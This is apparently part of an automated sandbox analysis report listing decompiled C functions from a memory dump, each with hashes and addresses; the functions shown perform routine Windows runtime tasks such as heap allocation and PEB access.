                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d5274ad87dbb93667cb7a565cb3d161376e82c7e1360b0e4057abf83ffe8c9f6
                                                          • Instruction ID: 17f77a873a59accb928d00d69ada656d3c6100e769ea909a977397f2c8ff6784
                                                          • Opcode Fuzzy Hash: d5274ad87dbb93667cb7a565cb3d161376e82c7e1360b0e4057abf83ffe8c9f6
                                                          • Instruction Fuzzy Hash: 30F0272F4116D44FDE32EBA57001AE2AFD4D756110B4D0887D7901F308C9B98887DA18
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03508B58, Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 36%
                                                          			E03508B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x352d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E03457D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0347B640(E03479AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                          0x03508b67
                                                          0x03508b6f
                                                          0x03508b72
                                                          0x03508b7d
                                                          0x03508b8f
                                                          0x03508b7f
                                                          0x03508b88
                                                          0x03508b88
                                                          0x03508b9a
                                                          0x03508b9b
                                                          0x03508b9d
                                                          0x03508ba2
                                                          0x03508bb5

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b89f68080b492d8c5f43e880939cbba1da3b58437f039dd109fd8c1a17200207
                                                          • Instruction ID: 70056baeaebeeb67e28e0db3933efb0333687509d6b5aa0751cd190b99547a97
                                                          • Opcode Fuzzy Hash: b89f68080b492d8c5f43e880939cbba1da3b58437f039dd109fd8c1a17200207
                                                          • Instruction Fuzzy Hash: 8FF05EB4A04258AFDB10EBA9E906E6EB7B4EB04200F140469BA159F2D1EA35D900C798
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03434F2E, Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E03434F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E035088F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0345C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x3411030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                          0x03434f2e
                                                          0x03434f34
                                                          0x03434f38
                                                          0x03490b85
                                                          0x03490b85
                                                          0x03490b89
                                                          0x03490b9a
                                                          0x03490b9a
                                                          0x03490b9f
                                                          0x00000000
                                                          0x03490b9f
                                                          0x03490b94
                                                          0x03490b98
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x03490b98
                                                          0x03434f3e
                                                          0x03434f48
                                                          0x00000000
                                                          0x03434f6e
                                                          0x00000000
                                                          0x03434f70

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f157702b5421c37d27b0061ea3b1a2e9caecff86a3b9389ecabd408cb0f9f4e0
                                                          • Instruction ID: 9ec34920f38635991176fc602ede1231b6afc8f1c6c2c3abc9cba7dda3e9d029
                                                          • Opcode Fuzzy Hash: f157702b5421c37d27b0061ea3b1a2e9caecff86a3b9389ecabd408cb0f9f4e0
                                                          • Instruction Fuzzy Hash: 18F0BE369217949FEB70D798C180B23BBE8AB046BCF0844A7D815CFB22C724EC40C648
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0345746D, Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E0345746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0344EB70(__ecx, 0x35279a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E034795D0();
							L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                          0x0345746d
                                                          0x0345746d
                                                          0x0345746d
                                                          0x03457471
                                                          0x03457488
                                                          0x0349f92d
                                                          0x0345748e
                                                          0x03457491
                                                          0x03457495
                                                          0x0349f937
                                                          0x0349f93a
                                                          0x0349f94e
                                                          0x0349f953
                                                          0x0349f956
                                                          0x0349f956
                                                          0x03457495
                                                          0x00000000
                                                          0x03457488
                                                          0x03457473
                                                          0x03457478
                                                          0x0345747d
                                                          0x03457481
                                                          0x00000000
                                                          0x03457481
                                                          0x0345747d
                                                          0x0345747a
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 699f197e76a8897e6efa74e1d178b38f96da0fa9889805d4334ca50a51e79561
                                                          • Instruction ID: 9f69154d4b039ae756678be6ceefd4bcf2af343372afd14ab79596f83484aaad
                                                          • Opcode Fuzzy Hash: 699f197e76a8897e6efa74e1d178b38f96da0fa9889805d4334ca50a51e79561
                                                          • Instruction Fuzzy Hash: 31F03035D05644AADF11DB68C540B7ABF75AF06252F08017BECA1AF262E76598028B8D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03508CD6, Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 36%
                                                          			E03508CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x352d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E03457D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0347B640(E03479AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                          0x03508ce5
                                                          0x03508ced
                                                          0x03508cf0
                                                          0x03508cfb
                                                          0x03508d0d
                                                          0x03508cfd
                                                          0x03508d06
                                                          0x03508d06
                                                          0x03508d18
                                                          0x03508d19
                                                          0x03508d1b
                                                          0x03508d20
                                                          0x03508d33

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 55dbbd7e32f2a48a0cf6aefd47378463e4d8964c53447e2b2894bc348760d4a0
                                                          • Instruction ID: 9fabad347b66b949e530cd7f65c919db346568a2be5aa74d414087de6b337fce
                                                          • Opcode Fuzzy Hash: 55dbbd7e32f2a48a0cf6aefd47378463e4d8964c53447e2b2894bc348760d4a0
                                                          • Instruction Fuzzy Hash: DDF0E271A04208AFCF00EBB9E846EAE77B4EF18300F1401AAF911EF2D0EA34D900C758
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0346A44B, Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0346A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x3527b9c; // 0x0
				_t15 = __ecx;
				_t16 = L03454620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0347FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                          0x0346a44b
                                                          0x0346a453
                                                          0x0346a472
                                                          0x0346a476
                                                          0x00000000
                                                          0x0346a493
                                                          0x0346a47a
                                                          0x0346a47f
                                                          0x0346a486
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 013bd74a353f09fff4941a75674409956dd688be90323bfedd7888b83e550f81
                                                          • Instruction ID: 9d3ff58883f261949689f9d1492a80a54dfea37c4ddc2dab5b48e8ca17acda16
                                                          • Opcode Fuzzy Hash: 013bd74a353f09fff4941a75674409956dd688be90323bfedd7888b83e550f81
                                                          • Instruction Fuzzy Hash: 7CE092B2A02821ABD221DE19AC00F67B39DDBE5A51F09403AF905DF224D628DD06C7E5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0343F358, Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 79%
                                                          			E0343F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0346F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L03454620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                          0x0343f35d
                                                          0x0343f361
                                                          0x0343f367
                                                          0x0343f372
                                                          0x0343f38c
                                                          0x0343f38c
                                                          0x0343f394

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                          • Instruction ID: 3e0b8fcf1e303aa2287ea42abc385d035c178edc91c867268c31163d10c02725
                                                          • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                          • Instruction Fuzzy Hash: EDE0D832E41218BFCB21DADA9D05F5BBBACDB48A60F040157F904DF150D5649D44C2D2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0344FF60, Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0344FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x34111a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E035088F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E03450050(_t14);
				}
			}










                                                          0x0344ff66
                                                          0x0344ff6b
                                                          0x00000000
                                                          0x0344ff8f
                                                          0x00000000
                                                          0x0344ff8f

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5858d703e2f1756a201f2f8e20261ee613a985d548618de75344abedbc5ae85d
                                                          • Instruction ID: 830e012d8d13312e024ce81bfbf6912d71394e4d6ea560c654c1b5d428be6eea
                                                          • Opcode Fuzzy Hash: 5858d703e2f1756a201f2f8e20261ee613a985d548618de75344abedbc5ae85d
                                                          • Instruction Fuzzy Hash: 00E0DFB56053449FE734DB52E080F2777ACAF42729F1D84AFE4084FE02C622D885C20E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034ED380, Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E034ED380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0343E8B0(__ecx, _a4, 0xfff);
					L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                          0x034ed38a
                                                          0x034ed39b
                                                          0x034ed3b1
                                                          0x00000000
                                                          0x034ed3b6
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                          • Instruction ID: b9a5294db5a03716f101486e19c4ce5bc74e40f5f22678e045fa8aa7a4147c7c
                                                          • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                          • Instruction Fuzzy Hash: 94E0C236685304BFDB229E44CC00F69BB1ADF417A1F104036FE085FB90C671AC91D6C8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034C41E8, Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 82%
                                                          			E034C41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x35108f0);
				_t5 = E0348D08C(__ebx, __edi, __esi);
				if( *0x35287ec == 0) {
					E0344EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x35287ec == 0) {
						 *0x35287f0 = 0x35287ec;
						 *0x35287ec = 0x35287ec;
						 *0x35287e8 = 0x35287e4;
						 *0x35287e4 = 0x35287e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L034C4248();
				}
				return E0348D0D1(_t5);
			}





                                                          0x034c41e8
                                                          0x034c41ea
                                                          0x034c41ef
                                                          0x034c41fb
                                                          0x034c4206
                                                          0x034c420b
                                                          0x034c4216
                                                          0x034c421d
                                                          0x034c4222
                                                          0x034c422c
                                                          0x034c4231
                                                          0x034c4231
                                                          0x034c4236
                                                          0x034c423d
                                                          0x034c423d
                                                          0x034c4247

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c6c633a0b99823c6a66968b74060bc0b625ce20f0b34abfaff46c5cc71521b3
                                                          • Instruction ID: f62b8798f2a7e0dbfe37fa642b3ed2a3e12c23b2ef5192d02aee468c8d7e6633
                                                          • Opcode Fuzzy Hash: 9c6c633a0b99823c6a66968b74060bc0b625ce20f0b34abfaff46c5cc71521b3
                                                          • Instruction Fuzzy Hash: 9EF01C78921B64DEEBB6FFE6A501B0836A4F766311F18416E91008F3A8C775448AEF09
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0346A185, Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0346A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x35267e4 >= 0xa) {
					if(_t5 < 0x3526800 || _t5 >= 0x3526900) {
						return L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E03450010(0x35267e0, _t5);
				}
			}





                                                          0x0346a190
                                                          0x0346a1a6
                                                          0x0346a1c2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0346a192
                                                          0x0346a192
                                                          0x0346a19f
                                                          0x0346a19f

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e4780d10addad242ed07c7910f147e336efcb20def0d9733a262fda849b17909
                                                          • Instruction ID: 2a4e63da1c32582492e451b85ad9d859b30f2ebcfb20d3eeb8d47699073d8849
                                                          • Opcode Fuzzy Hash: e4780d10addad242ed07c7910f147e336efcb20def0d9733a262fda849b17909
                                                          • Instruction Fuzzy Hash: 4CD02BB1A208441AC62CEB05BE14B213A92F785700F34045FF1030E6F4DFD0C8D4910D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034616E0, Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E034616E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E03461710(0x35267e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L03454620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                          0x034616e8
                                                          0x034616ef
                                                          0x034616f3
                                                          0x034616fe
                                                          0x00000000
                                                          0x03461700
                                                          0x0346170d
                                                          0x0346170d
                                                          0x034616f2
                                                          0x034616f2
                                                          0x034616f2
                                                          0x034616f2

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86d2d730d70171f738d8d2c9215f7302b4308d5b573311f0339fa2e53a269e04
                                                          • Instruction ID: b6d56cd087d9f396ec46e920daf0da4293b0a5a240ac8d6efb10f1657ae77e86
                                                          • Opcode Fuzzy Hash: 86d2d730d70171f738d8d2c9215f7302b4308d5b573311f0339fa2e53a269e04
                                                          • Instruction Fuzzy Hash: B6D0A7752012405BDA2DDF12A804B153252EB80781F3C005EF5074D9E1CFA4CCA2E04D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034B53CA, Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E034B53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0344EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                          0x034b53ca
                                                          0x034b53ce
                                                          0x034b53d9
                                                          0x034b53de
                                                          0x034b53e1
                                                          0x034b53e1
                                                          0x034b53e6
                                                          0x034b53f3
                                                          0x00000000
                                                          0x034b53f8
                                                          0x034b53fb

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                          • Instruction ID: 715b79ca2d1b894f1033948373a4505d97f762e1eb1ee3672c1de035c0dc60e3
                                                          • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                          • Instruction Fuzzy Hash: 6AE08C359007809FCF12EB89C650F8EFBF5FB45B00F180459A4085F721C624AC00CB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0344AAB0, Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0344AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                          0x0344aab6
                                                          0x0344aabb
                                                          0x0349a442
                                                          0x00000000
                                                          0x0349a448
                                                          0x0349a454
                                                          0x0349a454
                                                          0x0344aac1
                                                          0x0344aac1
                                                          0x0344aac6
                                                          0x0344aac6

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                          • Instruction ID: ba1412334c37763198d8b0b8961ebab897801327b6e66c9108d85d80470bb203
                                                          • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                          • Instruction Fuzzy Hash: BED0E935352980CFE716CB1DC958B1677A8FB44B44FC904E1E501CF761E62CD944CA04
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034635A1, Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E034635A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0344EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                          0x034635a1
                                                          0x034635a1
                                                          0x034635a5
                                                          0x034635ab
                                                          0x034635ab
                                                          0x034635b5
                                                          0x00000000
                                                          0x034635c1
                                                          0x034635b7

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                          • Instruction ID: d4b025a8a2f19a473fdf89f83d5fb4b04077d6250dd28770da7517f8b9886c8a
                                                          • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                          • Instruction Fuzzy Hash: B8D09E395515C5DDDB92EF50C1347697665BB00214F5810EB94470F5618225495A960A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0343DB40, Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0343DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L03454620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                          0x0343db4d
                                                          0x0343db54
                                                          0x0343db5f
                                                          0x0343db56
                                                          0x0343db56
                                                          0x0343db5c
                                                          0x0343db5c

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                          • Instruction ID: ebfc2a6d7541523ac7537d67ef079819c1bbf9b2a0fd975b289704b0b606b7d4
                                                          • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                          • Instruction Fuzzy Hash: 99C08C30281B00AEEB229F21CD01B0176A1BB02B41F4800A17701DE4F0DB7CD801EA04
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034BA537, Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E034BA537(intOrPtr _a4, intOrPtr _a8) {

				return L03458E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                          0x034ba553

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
